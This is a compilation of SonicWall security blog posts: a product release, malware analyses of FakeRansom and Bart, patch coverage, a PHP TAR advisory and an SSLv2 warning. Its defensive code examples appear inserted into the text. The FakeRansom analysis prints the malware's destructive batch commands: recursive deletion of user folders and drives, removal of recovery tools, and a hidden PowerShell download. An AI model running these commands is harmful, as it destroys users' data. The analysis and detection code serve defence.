SonicWall Email Security 8.3 Delivers New Spam Detection and Authentication

Summertime means different things to different people. Whether it be kids enjoying time off from school, or parents taking long family vacations, summertime gives everyone an opportunity to re-energize and re-focus.

Everyone that is, including hackers.

Threats to your infrastructure don’t take a vacation, and if you’re entrusted with securing your organization’s email, it’s important not to let your guard down during these warm summer days.

SonicWall Email Security solutions continuously protect your email infrastructure from ever-increasing threats, including spam, phishing attacks and malware. And now you can rest even easier, knowing that the protection provided by SonicWall Email Security has been improved once again. Our latest release, Email Security 8.3, delivers more effective protection against emerging threats through the following key features:

  • New Spam-Detection Engine – uses both a retrained Adversarial Bayesian model and a new machine-learning model based on a Support Vector Machine (SVM) approach
  • SMTP Authentication – requires users to authenticate before sending outbound email, so unauthorized users cannot relay mail through your infrastructure

Additionally, SonicWall Email Security solutions continue leveraging a robust architecture to deliver superior protection with the following features:

  • Multi-Layer Protection – proven, patented, email scanning technologies deliver superior real-time protection
  • Automated Management and Reporting – minimize required administration time
  • Compliance & Encryption Management – protect against confidential data leaks and compliance violations
  • Flexible Deployment Options – on-premises, virtual and cloud-based, to best meet business infrastructure requirements
  • Scalable – can be configured for growth and redundancy, so your infrastructure can grow as required without large upfront costs
  • Multi-Tenancy – enables MSPs to provision and manage email security services for multiple customers

SonicWall System Architecture

Graphic of SonicWall's System Architecture of Email Security 8.3

SonicWall Email Security provides the comprehensive protection needed, so maybe you too can enjoy your summer!

SonicWall Email Security 8.3 is available today for download for customers with a valid license. For more information, contact your preferred reseller, reach us directly at 888.557.6642 or sales@sonicwall.com, or visit us for product details here.

FakeRansom: Deletes files then demands payment for nothing (Jul 15th, 2016)

The SonicWall Threats Research team has observed a new “ransomware” written by a seemingly lazy author. Ransomware operators traditionally do restore files once the victim pays, since their business model depends on victims believing that payment works. This “ransomware” does not. It deletes everything in its path with no possibility of recovery: there is no encryption of files on the system, and no key exchange with a remote key server. There is, of course, a bitcoin address provided in order to “retrieve” the deleted files. Paying achieves nothing, because the operator holds nothing to give back. Unless the victim runs a file-recovery (undelete) tool immediately after infection, before the freed disk sectors are overwritten, the files are permanently lost.

Infection Cycle:

The Trojan makes the following DNS query and attempts to report the infection to the remote server hosted on Amazon Web Services:

The Trojan adds the following files to the filesystem:

  • %APPDATA%\winstrsp.exe [Detected as GAV: FakeRansom.A (Trojan)]
  • %TEMP%\winopen.exe\winopen.exe [Detected as GAV: Fakelock.C (Trojan)]
  • %TEMP%\~8.bat

The Trojan sets itself up to run on reboot using schtasks.exe. The file z544 is an XML file containing the task definition:

The Trojan runs winopen.exe\winopen.exe, which displays the following image and shuts down the system within one minute:

It runs ~8.bat. Below is a sample of the instructions contained in the batch script. Each block sets a target, changes into it and removes every entry it lists, falling back to del when rmdir fails on a file. (Note the trailing wildcard on each cd target: cmd.exe rejects it, so each loop most likely runs in whatever the current directory happens to be, which is no less destructive.)

      @echo off
      set folder="%AppData%\Local\Temp\*"
      cd /d %folder%
      for /F "delims=" %%i in ('dir /b') do (rmdir "%%i" /s/q || del "%%i" /s/q)
      @echo off
      set folder="%USERPROFILE%\Desktop\*"
      cd /d %folder%
      for /F "delims=" %%i in ('dir /b') do (rmdir "%%i" /s/q || del "%%i" /s/q)
      @echo off
      set folder="C:\Windows\System32\Restore\*"
      cd /d %folder%
      for /F "delims=" %%i in ('dir /b') do (rmdir "%%i" /s/q || del "%%i" /s/q)

It then deletes everything on the D: and E: drives (typically secondary or mapped network drives) and empties the Recycle Bin on C:, removing one more chance of recovery:

      @echo off
      set folder="D:\*"
      cd /d %folder%
      for /F "delims=" %%i in ('dir /b') do (rmdir "%%i" /s/q || del "%%i" /s/q)
      @echo off
      set folder="E:\*"
      cd /d %folder%
      for /F "delims=" %%i in ('dir /b') do (rmdir "%%i" /s/q || del "%%i" /s/q)
      @echo off
      set Drive=C:
      if exist %Drive%\$RECYCLE.BIN (
      pushd %Drive%\$RECYCLE.BIN
      del /s /q .
      popd
      )

It deletes the system executables used to manage Volume Shadow Copies and System Restore (vssadmin.exe and rstrui.exe). Both files are owned by TrustedInstaller, so a plain del from an ordinary user context fails, and even an elevated script has to take ownership first; where it does succeed, the built-in restore path is gone:

      @echo off
      del "C:\Windows\System32\vssadmin.exe"
      timeout /t 2 /nobreak
      @echo off
      del "C:\Windows\System32\rstrui.exe"
      timeout /t 2 /nobreak

The script also uses Windows PowerShell, with the execution policy bypassed and the window hidden, to download the payment-instructions image to the desktop and then open it with the default image viewer via cmd /c:

      @echo off
      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('https://s3-us-west-1.amazonaws.com/docs.pdf/anon.jpg','%USERPROFILE%\Desktop\Payment_Instructions.jpg');
      cmd /c '%USERPROFILE%\Desktop\Payment_Instructions.jpg'
      timeout /t 200 /nobreak
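The behaviours quoted above (recursive wipe loops over user directories and drive roots, emptying the Recycle Bin, deleting vssadmin.exe and rstrui.exe, and a hidden PowerShell download-and-open) are easy to recognise statically. The following static triage script is an added example written for this page; it is not SonicWall's detection code. The sample batch file it scans is constructed from the fragments quoted above (with a placeholder URL), and the indicator weights and threshold are assumptions chosen for illustration.

```python
"""Static triage of a Windows batch script for wiper-style behaviour.
Added example; not SonicWall's code. SAMPLE_BAT is constructed from the
~8.bat fragments quoted in the write-up, with a placeholder download URL."""
import re

# (name, pattern, weight). Case-insensitive because cmd.exe is. Weights are assumptions.
INDICATORS = [
    ("recursive_wipe_loop",   # dir /b piped into rmdir /s /q with a del fallback
     re.compile(r"""for\s+/F\s+"delims="\s+%%\w\s+in\s+\('dir\s+/b'\)\s+do\s*\(\s*rmdir\s+"%%\w"\s+/s\s*/q\s*\|\|\s*del""", re.I), 3),
    ("wipes_user_profile",    # target under the user's profile / AppData
     re.compile(r'set\s+folder="?%(USERPROFILE|APPDATA|LOCALAPPDATA)%', re.I), 2),
    ("wipes_drive_root",      # target is the root of a secondary or mapped drive
     re.compile(r'set\s+folder="?[D-Z]:\\\*', re.I), 2),
    ("empties_recycle_bin",
     re.compile(r"\$RECYCLE\.BIN", re.I), 1),
    ("deletes_vss_tools",     # removes shadow-copy / System Restore tooling
     re.compile(r'del\s+"?[^"\r\n]*\\(vssadmin|rstrui)\.exe', re.I), 4),
    ("powershell_download",   # policy bypass + WebClient download on one line
     re.compile(r"powershell(\.exe)?\b[^\r\n]*-ExecutionPolicy\s+bypass[^\r\n]*DownloadFile\(", re.I), 3),
]

def scan_batch(script: str) -> dict:
    """Return {indicator_name: hit_count} for every indicator that fires."""
    hits = {}
    for name, pattern, _weight in INDICATORS:
        n = len(pattern.findall(script))
        if n:
            hits[name] = n
    return hits

def risk_score(script: str) -> int:
    """Sum of weights of the indicators present (each counted once)."""
    weights = {name: w for name, _p, w in INDICATORS}
    return sum(weights[name] for name in scan_batch(script))

def is_wiper(script: str, threshold: int = 6) -> bool:
    """Assumed threshold: any two destructive indicators together trip it."""
    return risk_score(script) >= threshold

# Constructed sample based on the quoted ~8.bat fragments (placeholder URL).
SAMPLE_BAT = r'''@echo off
set folder="%USERPROFILE%\Desktop\*"
cd /d %folder%
for /F "delims=" %%i in ('dir /b') do (rmdir "%%i" /s/q || del "%%i" /s/q)
@echo off
set folder="D:\*"
cd /d %folder%
for /F "delims=" %%i in ('dir /b') do (rmdir "%%i" /s/q || del "%%i" /s/q)
set Drive=C:
if exist %Drive%\$RECYCLE.BIN (
pushd %Drive%\$RECYCLE.BIN
del /s /q .
popd
)
del "C:\Windows\System32\vssadmin.exe"
timeout /t 2 /nobreak
del "C:\Windows\System32\rstrui.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('https://example.invalid/anon.jpg','%USERPROFILE%\Desktop\Payment_Instructions.jpg');
cmd /c '%USERPROFILE%\Desktop\Payment_Instructions.jpg'
'''

if __name__ == "__main__":
    print(scan_batch(SAMPLE_BAT))
    print("score:", risk_score(SAMPLE_BAT), "wiper:", is_wiper(SAMPLE_BAT))
```

The loop pattern is deliberately specific to the `dir /b` → `rmdir || del` idiom; the other indicators are generic enough to flag scripts that wipe a profile or delete recovery tooling even when the loop is written differently.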

A quick look at the bitcoin address on blockchain.info shows that the operator has made some income, but not much:

SonicWALL Gateway AntiVirus provides protection against this threat via the following signatures:

  • GAV: FakeRansom.A (Trojan)
  • GAV: Fakelock.C (Trojan)

Microsoft Security Bulletin Coverage (July 12, 2016)

Dell SonicWALL has analyzed and addressed Microsoft’s security advisories for July 12, 2016. The issues reported, along with Dell SonicWALL coverage information, are as follows:

MS16-084 Cumulative Security Update for Internet Explorer

  • CVE-2016-3204 Scripting Engine Memory Corruption Vulnerability
    There are no known exploits in the wild.
  • CVE-2016-3240 Internet Explorer Memory Corruption Vulnerability
    IPS:11711 "Internet Explorer Memory Corruption Vulnerability (MS16-084) 1"
  • CVE-2016-3241 Internet Explorer Memory Corruption Vulnerability
    IPS:11712 "Internet Explorer Memory Corruption Vulnerability (MS16-084) 2"
  • CVE-2016-3242 Microsoft Browser Memory Corruption Vulnerability
    IPS:11713 "Internet Explorer Memory Corruption Vulnerability (MS16-084) 3"
  • CVE-2016-3243 Internet Explorer Memory Corruption Vulnerability
    There are no known exploits in the wild.
  • CVE-2016-3245 Internet Explorer Security Feature Bypass Vulnerability
    There are no known exploits in the wild.
  • CVE-2016-3248 Scripting Engine Memory Corruption Vulnerability
    There are no known exploits in the wild.
  • CVE-2016-3259 Scripting Engine Memory Corruption Vulnerability
    IPS:11716 "Scripting Engine Memory Corruption Vulnerability (MS16-084) 1"
  • CVE-2016-3260 Scripting Engine Memory Corruption Vulnerability
    There are no known exploits in the wild.
  • CVE-2016-3261 Internet Explorer Information Disclosure Vulnerability
    IPS:11717 "Internet Explorer Information Disclosure Vulnerability (MS16-084) 1"
  • CVE-2016-3273 Microsoft Browser XSS Vulnerability
    There are no known exploits in the wild.
  • CVE-2016-3274 Microsoft Browser Spoofing Vulnerability
    IPS:11718 "Microsoft Browser Spoofing Vulnerability (MS16-084) 1"
  • CVE-2016-3276 Microsoft Browser Spoofing Vulnerability
    IPS:11719 "Microsoft Browser Spoofing Vulnerability (MS16-084) 2"
  • CVE-2016-3277 Microsoft Browser Information Disclosure Vulnerability
    IPS:11724 "Internet Explorer Memory Corruption Vulnerability (MS16-085) 9"

MS16-085 Cumulative Security Update for Microsoft Edge

  • CVE-2016-3244 Microsoft Edge Security Feature Bypass
    IPS:11721 "Internet Explorer Memory Corruption Vulnerability (MS16-085) 6"
  • CVE-2016-3246 Microsoft Edge Memory Corruption Vulnerability
    IPS:11722 "Internet Explorer Memory Corruption Vulnerability (MS16-085) 7"
  • CVE-2016-3248 Scripting Engine Memory Corruption Vulnerability
    There are no known exploits in the wild.
  • CVE-2016-3259 Scripting Engine Memory Corruption Vulnerability
    IPS:11716 "Scripting Engine Memory Corruption Vulnerability (MS16-084) 1"
  • CVE-2016-3260 Scripting Engine Memory Corruption Vulnerability
    There are no known exploits in the wild.
  • CVE-2016-3265 Scripting Engine Memory Corruption Vulnerability
    There are no known exploits in the wild.
  • CVE-2016-3269 Scripting Engine Memory Corruption Vulnerability
    There are no known exploits in the wild.
  • CVE-2016-3271 Scripting Engine Information Disclosure Vulnerability
    IPS:11723 "Internet Explorer Memory Corruption Vulnerability (MS16-085) 8"
  • CVE-2016-3273 Microsoft Browser XSS Vulnerability
    There are no known exploits in the wild.
  • CVE-2016-3274 Microsoft Browser Spoofing Vulnerability
    IPS:11718 "Microsoft Browser Spoofing Vulnerability (MS16-084) 1"
  • CVE-2016-3276 Microsoft Browser Spoofing Vulnerability
    IPS:11719 "Microsoft Browser Spoofing Vulnerability (MS16-084) 2"
  • CVE-2016-3277 Microsoft Browser Information Disclosure Vulnerability
    IPS:11724 "Internet Explorer Memory Corruption Vulnerability (MS16-085) 9"

MS16-086 Cumulative Security Update for JScript and VBScript

  • CVE-2016-3204 Scripting Engine Memory Corruption Vulnerability
    There are no known exploits in the wild.

MS16-087 Security Update for Windows Print Spooler Components

  • CVE-2016-3238 Microsoft Print Spooler Remote Code Execution Vulnerability
    This is a local vulnerability.
  • CVE-2016-3239 Windows Print Spooler Elevation of Privilege
    This is a local vulnerability.

MS16-088 Security Update for Microsoft Office

  • CVE-2016-3278 Microsoft Office Memory Corruption Vulnerability
    There are no known exploits in the wild.
  • CVE-2016-3279 Microsoft Office Remote Code Execution Vulnerability
    IPS:11725 "Internet Explorer Memory Corruption Vulnerability (MS16-088) 10"
  • CVE-2016-3280 Microsoft Office Memory Corruption Vulnerability
    IPS:11726 "Internet Explorer Memory Corruption Vulnerability (MS16-088) 11"
  • CVE-2016-3281 Microsoft Office Memory Corruption Vulnerability
    SPY:1100 "Malformed-File doc.MP.38"
  • CVE-2016-3282 Microsoft Office Memory Corruption Vulnerability
    SPY:1101 "Malformed-File doc.MP.39"
  • CVE-2016-3283 Microsoft Office Memory Corruption Vulnerability
    SPY:1102 "Malformed-File doc.MP.40"
  • CVE-2016-3284 Microsoft Office Memory Corruption Vulnerability
    There are no known exploits in the wild.

MS16-089 Security Update for Windows Secure Kernel Mode

  • CVE-2016-3256 Windows Secure Kernel Information Disclosure Vulnerability
    There are no known exploits in the wild.

MS16-090 Security Update for Windows Kernel-Mode Drivers

  • CVE-2016-3249 Win32k Elevation of Privilege Vulnerability
    This is a local vulnerability.
  • CVE-2016-3250 Win32k Elevation of Privilege Vulnerability
    This is a local vulnerability.
  • CVE-2016-3251 GDI Component Information Disclosure Vulnerability
    This is a local vulnerability.
  • CVE-2016-3252 Win32k Elevation of Privilege Vulnerability
    This is a local vulnerability.
  • CVE-2016-3254 Win32k Elevation of Privilege Vulnerability
    This is a local vulnerability.
  • CVE-2016-3286 Win32k Elevation of Privilege Vulnerability
    This is a local vulnerability.

MS16-091 Security Update for .NET Framework

  • CVE-2016-3255 .NET Information Disclosure Vulnerability
    There are no known exploits in the wild.

MS16-092 Security Update for Windows Kernel

  • CVE-2016-3258 Windows File System Security Feature Bypass Vulnerability
    There are no known exploits in the wild.
  • CVE-2016-3272 Windows Kernel Information Disclosure Vulnerability
    There are no known exploits in the wild.

MS16-094 Security Update for Secure Boot

  • CVE-2016-3287 Secure Boot Security Feature Bypass Vulnerability
    There are no known exploits in the wild.

PHP TAR File Parsing Uninitialized Reference (CVE-2016-4343)

A remotely triggerable vulnerability exists in PHP’s TAR archive parsing. It requires no authentication beyond getting the server to parse an attacker-supplied archive, and a crafted archive can crash the PHP process or allow an attacker to execute arbitrary code on the web server. CVE-2016-4343 is assigned to this vulnerability.

PHP is a server-side scripting language designed for web development but also used as a general-purpose programming language. PHP code may be embedded into HTML code, or it can be used in combination with various web template systems, web content management systems and web frameworks.

The vulnerability lies in the phar extension’s handling of TAR archives (the phar_make_dirstream function named in the signature below). The parser trusts the values in entry headers without validating them, and for certain malformed entries it goes on to use a pointer that was never initialized. A remote attacker who can get a malicious TAR archive parsed by the vulnerable server can crash it or potentially execute code.
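What “properly validate the values inside the headers” means in practice is shown by the following defensive ustar header parser. It is an added example written for this page, not PHP’s phar code, and it does not reproduce the phar bug; it shows the checks a TAR reader should apply to every 512-byte header before acting on it: header checksum, a strictly octal size field, a size bounded by the bytes actually present, and a path that cannot escape the extraction root. The archives it runs on are constructed in memory with Python’s tarfile module, and the helper that rewrites a size field (fixing the checksum so the header is internally consistent but hostile) exists only to exercise the checks.

```python
"""Defensive ustar (POSIX TAR) header validation. Added example; not PHP's
phar code. Sample archives are constructed in memory."""
import io
import posixpath
import tarfile

BLOCK = 512

class BadHeader(ValueError):
    """Raised for any header value a reader must not trust."""

def _octal(field: bytes, name: str) -> int:
    """Parse a NUL/space-padded octal field; reject anything that is not octal."""
    s = field.rstrip(b"\x00 ").lstrip(b" ")
    if not s or any(c not in b"01234567" for c in s):
        raise BadHeader(f"{name}: non-octal value {field!r}")
    return int(s, 8)

def _checksum(header: bytes) -> int:
    # The 8-byte chksum field (offset 148) is summed as if it were all spaces.
    return sum(header[:148]) + 8 * 0x20 + sum(header[156:])

def parse_header(header: bytes, remaining: int) -> dict:
    """Validate one header block; `remaining` is the byte count after it."""
    if len(header) != BLOCK:
        raise BadHeader("short header")
    if _checksum(header) != _octal(header[148:156], "chksum"):
        raise BadHeader("checksum mismatch")
    name = header[0:100].split(b"\x00", 1)[0].decode("utf-8", "replace")
    if header[257:263] == b"ustar\x00":           # POSIX ustar: honour the prefix field
        prefix = header[345:500].split(b"\x00", 1)[0].decode("utf-8", "replace")
        if prefix:
            name = prefix + "/" + name
    size = _octal(header[124:136], "size")
    if size > remaining:
        raise BadHeader(f"size {size} exceeds archive data ({remaining} bytes left)")
    # Path hardening: reject absolute paths and anything that resolves above the root.
    norm = posixpath.normpath(name)
    if name.startswith("/") or norm == ".." or norm.startswith("../"):
        raise BadHeader(f"path escapes extraction root: {name!r}")
    return {"name": name, "size": size, "typeflag": header[156:157]}

def list_entries(archive: bytes) -> list:
    """Walk an archive, validating every header; returns (name, size) pairs."""
    entries, pos = [], 0
    while pos + BLOCK <= len(archive):
        header = archive[pos:pos + BLOCK]
        if header == b"\x00" * BLOCK:             # end-of-archive marker
            break
        pos += BLOCK
        info = parse_header(header, len(archive) - pos)
        entries.append((info["name"], info["size"]))
        pos += (info["size"] + BLOCK - 1) // BLOCK * BLOCK   # skip data, using the validated size
    return entries

def validate_archive(archive: bytes):
    """(entries, None) on success, or (None, message) for the first bad header."""
    try:
        return list_entries(archive), None
    except BadHeader as e:
        return None, str(e)

def make_archive(files: dict) -> bytes:
    """Build a ustar archive in memory from {name: data} (constructed sample input)."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w", format=tarfile.USTAR_FORMAT) as tar:
        for name, data in files.items():
            ti = tarfile.TarInfo(name)
            ti.size = len(data)
            tar.addfile(ti, io.BytesIO(data))
    return buf.getvalue()

def set_size_field(archive: bytes, size_field: bytes, offset: int = 0) -> bytes:
    """Overwrite the size field of the header at `offset` and recompute its checksum,
    simulating a header whose values are hostile but internally consistent."""
    hdr = bytearray(archive[offset:offset + BLOCK])
    hdr[124:136] = size_field.ljust(12, b"\x00")
    hdr[148:156] = b"%06o\x00 " % (sum(hdr[:148]) + 8 * 0x20 + sum(hdr[156:]))
    return archive[:offset] + bytes(hdr) + archive[offset + BLOCK:]

if __name__ == "__main__":
    good = make_archive({"a.txt": b"hello", "dir/b.bin": b"\x00" * 1000})
    print(validate_archive(good))
    print(validate_archive(make_archive({"../evil.sh": b"x"})))
    print(validate_archive(set_size_field(good, b"77777777777\x00")))
```

The size check against the bytes actually remaining is the one that matters most for a native parser: a trusted oversized value becomes an out-of-bounds read or a bad pointer, whereas here it is just a rejected archive.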

The following versions of PHP are vulnerable:

  • PHP prior to 5.5.36
  • PHP prior to 5.6.22
  • PHP prior to 7.0.7

The Dell SonicWALL team has written the following signature to help protect our customers from this attack:

  • 11699: PHP phar_make_dirstream Function DoS

Seven Ways to Help Avoid A Ransomware Crisis

The popularity and use of ransomware appear to be spreading at record pace in 2016 as cybercriminals are actively using ransomware to hold businesses, institutions and even individuals hostage. No one is immune to this sort of attack. If you’ve been following the news, you’re probably aware that authorities and security experts are calling this the new crisis in cybercrime today.

The rise of ransomware within the hacking economy can be attributed to how simple and fast attackers can potentially capitalize on thousands or millions of their victims in a short period of time as opposed to a targeted attack, which requires more work and time to monetize from a single data breach. To date, the SonicWall Threat Research Team has observed a 78% growth in ransomware variants over 2015. With recent discovery of the new “DMA Locker” in the wild earlier this month, the team found that organizations are hit by a range of highly active ransomware including:

  • CryptoWall (considered the most dangerous and most widely used so far)
  • TeslaCrypt
  • TorrentLocker
  • PadCrypt
  • Locky
  • CTB-Locker
  • FAKBEN
  • PayCrypt
  • DMA Locker

Below is a visual sample of DMA Locker to give you an idea of what an infected system looks like. A quick search for the bitcoin address “1C8yA7wJuKD4D2giTEpUNcdd7UNExEJ45r” on www.blockchain.info shows that the same address has been used in multiple transactions, indicating that thousands of dollars have already been paid by victims since its introduction.

Visual sample of the DMA Locker on the left and bitcoin address screenshot on the right.

With thousands of ransomware attacks every day, maintaining normal operations is essential to meeting your business objectives. Conduct routine security reviews and take the steps needed to improve your cyber-defenses and stop ransomware from spreading across your networks. The following seven recommendations reduce that risk considerably:

1. Training and awareness

Put a governance policy in place to make certain everyone in your organization is educated about the dangers of ransomware and trained to recognize the methods cyber-criminals use to compromise devices: social media, social engineering, suspicious websites and downloads, and the various spam and phishing scams.

2. Email security

Since phishing emails are the predominant way attackers distribute ransomware, deploy a capable email security solution that scans all attachments for malicious content and quarantines any file carrying ransomware.

3. Use a multi-layered approach to network security

Cyber-criminals are very good at using the latest exploit kits and web vulnerabilities to infect systems and devices with ransomware. Improve your security posture by eliminating siloed security architecture. A more effective approach is an adaptive cyber defense platform that combines multiple integrated threat-prevention capabilities, so there are many different points at which the malware infection cycle can be broken: advanced threat protection, gateway anti-malware, intrusion prevention and other network-based security services.

4. Secure the endpoints

Mobile devices are particularly targeted, as reported in the 2016 SonicWall Security Annual Threat Report, with emerging ransomware threats on the Android platform. Do everything possible to make sure your mobile endpoints are as secure as they can be, because devices of this sort are frequently outside your network and beyond its firewall protection. There are many good endpoint security options to match your risk tolerance. At a minimum, consider layering patch management, web content filtering and signature-less anti-virus (AV) software that uses machine learning to detect advanced threats on top of your traditional signature-based AV solution.

5. Network segmentation

Ransomware looks for any opportunity to spread from the endpoint to the servers and storage where valuable primary and secondary data live. Imagine the harm done if cyber-criminals gained unauthorized and unchallenged network access and could move laterally at will through an unsegmented network. To contain and mitigate propagation during an attack, keep your critical applications, data and devices isolated on separate networks or virtual LANs.

6. Backup and recovery

A California-based hospital recently paid approximately $17,000 to obtain the decryption key after a ransomware attack, in order to return its administrative functions to normal capacity quickly. This unfortunate incident is an opportunity to learn from others’ misfortune. The alternative to paying the ransom is a fast, reliable backup and disaster recovery (DR) strategy that lets you restore full operation with minimal disruption. Make sure the solution automatically tests and verifies that data is restorable and that the recovery service level is met.

7. Encrypted attacks

Not long ago, Yahoo users were the targets of one of the largest malvertising campaigns seen, after a criminal entity bought ad space on Yahoo’s website to plant malicious ads that installed ransomware on the computers of users visiting the site. The redirection code in the malicious advertisements used SSL/TLS encryption, which made it difficult for traditional defenses to detect.

If you’re not inspecting HTTPS traffic, you are effectively blind to any attack carried over SSL/TLS. It is therefore essential to deploy a next-generation firewall with a high-performance SSL inspection engine that can decrypt and inspect all Internet traffic to and from clients for threats hidden inside those SSL sessions. Keep in mind that inspection means the firewall terminates TLS on the client’s behalf: clients must trust the firewall’s signing CA, and applications that pin certificates, as well as categories you choose to exclude for privacy or compliance reasons, need explicit policy handling.

For more detailed information, I recommend you to read our technical brief: “How to protect against ransomware.”

Bart Ransomware spotted in the wild ( July 1, 2016)

The Dell SonicWall Threats Research team has received reports of a new ransomware Trojan, Bart, which does not implement its own file encryption (with AES or otherwise, as earlier families do). Instead, it locks each file inside a password-protected ZIP archive.

Infection cycle:

The Trojan arrives on the victim’s machine as a file posing as Adobe Media Encoder.

The Trojan adds the following files to the filesystem:

  • C:\windows\temp\(copy of original) [Detected as GAV: Bart.A (Trojan)]

The Trojan drops a batch file on the system:

  • C:\autoexec.bat

Usually a ransomware Trojan contacts its C&C server before encrypting files. Bart does not contact any C&C server; it simply replaces every file on the victim’s machine with a password-protected ZIP archive carrying the extension .bart.zip. Because no key is fetched or reported, blocking C&C traffic does nothing to stop it, and the only secret standing between the victim and the data is the archive password.

The Trojan creates the following file on the victim’s desktop and in every folder it processes:

  • recover.txt

It sets the following file (recover.bmp) as the desktop wallpaper:

The payment portal linked from the ransom note demands 2 bitcoins for the decryption tool and explains how to purchase bitcoins.

We urge our users to always be vigilant and cautious with unsolicited attachments, especially if you are not certain of the source.

SonicWALL Gateway AntiVirus provides protection against this threat via the following signature:

  • GAV: Bart.A (Trojan)

You Might Not Know You Are Still Using SSLv2.0 (July 1, 2016)

Netscape Communications designed the Secure Sockets Layer (SSL) protocol in 1994, and it has been the de facto standard for securing application traffic ever since. Over the years the protocol has evolved (SSLv2.0 -> SSLv3.0 -> TLSv1.0 -> TLSv1.1 -> TLSv1.2) to increase security.

Today, SSLv2.0 no longer provides a sufficiently high level of security. SSLv2.0 deficiencies include the following:

  • Message authentication uses MD5. Most security-aware users have already moved away from any use of MD5.
  • Handshake messages are not protected. This permits a man-in-the-middle to trick the client into picking a weaker cipher suite than it would normally choose.
  • Message integrity and message encryption use the same key, which is a problem if the client and server negotiate a weak encryption algorithm.
  • Sessions can be easily terminated. A man-in-the-middle can easily insert a TCP FIN to close the session, and the peer is unable to determine whether or not it was a legitimate end of the session.

It has been over 20 years since SSLv2.0 was published, and over 5 years since RFC 6176 (March 2011) prohibited its use. Yet many are still using the protocol, often without being aware of it.

In June 2016, less than 2% of firewalls reported receiving SSLv2.0 Server Hello message:

In June 2016, more than 40% of firewalls reported receiving SSLv2.0 Client Hello message:

The gap between the two figures is telling: many clients still open with an SSLv2-format ClientHello (often a v2-compatible hello that also advertises SSLv3 or TLS), while few servers still answer in SSLv2. Both sides matter. A client willing to speak SSLv2 can be downgraded by an attacker on the path, and a server that still accepts SSLv2 exposes its RSA key to the DROWN attack (CVE-2016-0800, published March 2016), which lets an attacker decrypt TLS sessions to any server sharing that key. Dell SonicWALL urges all customers to review their client and server software settings and stop using SSLv2.0 immediately. To check a server, scan it with nmap --script ssl-enum-ciphers (it reports SSLv2 explicitly), or connect with openssl s_client -ssl2 from an OpenSSL build that still includes SSLv2 (it was removed in OpenSSL 1.1.0).
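The ClientHello figures above are only meaningful if you can tell an SSLv2-format hello from a TLS one on the wire. The following parser is an added example written for this page, not SonicWall's firewall code. It classifies the first bytes of a client handshake, and for an SSLv2-format hello it lists the cipher kinds offered and flags whether any of them are genuine SSLv2 ciphers (a v2-compatible hello from a modern client may advertise only TLS suites in the 3-byte form). The record layout and cipher-kind values come from the SSL 2.0 specification; the sample hellos are constructed by the builder functions in the block.

```python
"""Distinguish SSLv2-format from TLS-format ClientHello messages.
Added example; not SonicWall's code. Sample messages are constructed."""
import struct

# SSLv2 cipher kinds (3 bytes each) from the SSL 2.0 specification.
SSL2_CIPHERS = {
    0x010080: "SSL_CK_RC4_128_WITH_MD5",
    0x020080: "SSL_CK_RC4_128_EXPORT40_WITH_MD5",
    0x030080: "SSL_CK_RC2_128_CBC_WITH_MD5",
    0x040080: "SSL_CK_RC2_128_CBC_EXPORT40_WITH_MD5",
    0x050080: "SSL_CK_IDEA_128_CBC_WITH_MD5",
    0x060040: "SSL_CK_DES_64_CBC_WITH_MD5",
    0x0700C0: "SSL_CK_DES_192_EDE3_CBC_WITH_MD5",
}

def parse_client_hello(data: bytes) -> dict:
    """Classify the first record of a client handshake; raises ValueError otherwise."""
    if len(data) < 11:
        raise ValueError("too short")
    b0 = data[0]
    if b0 & 0x80:
        # SSLv2 record: 2-byte header, high bit set, 15-bit length, no padding.
        length = ((b0 & 0x7F) << 8) | data[1]
        body = data[2:2 + length]
        if len(body) < 9 or body[0] != 0x01:          # MSG-CLIENT-HELLO
            raise ValueError("SSLv2 record but not a CLIENT-HELLO")
        version, cs_len, sid_len, chal_len = struct.unpack(">HHHH", body[1:9])
        if 9 + cs_len + sid_len + chal_len != length:
            raise ValueError("SSLv2 CLIENT-HELLO length fields inconsistent")
        if cs_len % 3:
            raise ValueError("cipher-specs length not a multiple of 3")
        specs = body[9:9 + cs_len]
        kinds = [int.from_bytes(specs[i:i + 3], "big") for i in range(0, cs_len, 3)]
        return {
            "format": "sslv2",
            "version": version,                       # 0x0002, or 0x0300+ for v2-compatible hellos
            "ciphers": [SSL2_CIPHERS.get(k, f"0x{k:06x}") for k in kinds],
            "offers_sslv2_ciphers": any(k in SSL2_CIPHERS for k in kinds),
        }
    if b0 == 0x16 and data[5] == 0x01:
        # TLS record layer (type 0x16 handshake) carrying a ClientHello (type 1).
        return {
            "format": "tls",
            "record_version": struct.unpack(">H", data[1:3])[0],
            "version": struct.unpack(">H", data[9:11])[0],
        }
    raise ValueError("not a recognised ClientHello")

def build_sslv2_client_hello(version: int, kinds: list, challenge: bytes = b"\x11" * 16) -> bytes:
    """Constructed SSLv2 CLIENT-HELLO with the given version and cipher kinds."""
    specs = b"".join(k.to_bytes(3, "big") for k in kinds)
    body = b"\x01" + struct.pack(">HHHH", version, len(specs), 0, len(challenge)) + specs + challenge
    return struct.pack(">H", 0x8000 | len(body)) + body

def build_tls_client_hello(version: int = 0x0303, suites=(0xC02F, 0x009C)) -> bytes:
    """Constructed minimal TLS ClientHello (no extensions)."""
    body = struct.pack(">H", version) + b"\x22" * 32 + b"\x00"   # version, random, empty session id
    body += struct.pack(">H", 2 * len(suites)) + b"".join(struct.pack(">H", s) for s in suites)
    body += b"\x01\x00"                                           # one compression method: null
    hs = b"\x01" + len(body).to_bytes(3, "big") + body
    return b"\x16\x03\x01" + struct.pack(">H", len(hs)) + hs

if __name__ == "__main__":
    print(parse_client_hello(build_sslv2_client_hello(0x0002, [0x010080, 0x0700C0])))
    print(parse_client_hello(build_sslv2_client_hello(0x0301, [0x00002F, 0x000035])))
    print(parse_client_hello(build_tls_client_hello()))
```

When triaging a capture, treat `format == "sslv2"` with `offers_sslv2_ciphers` true as a client that can genuinely be driven into SSLv2; a v2-compatible hello that offers only TLS suites is a weaker signal, but still identifies software old enough to deserve a look.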

SonicWall Announces Channel Partner Award Winners at EMEA PEAK16

EMEA PEAK 16

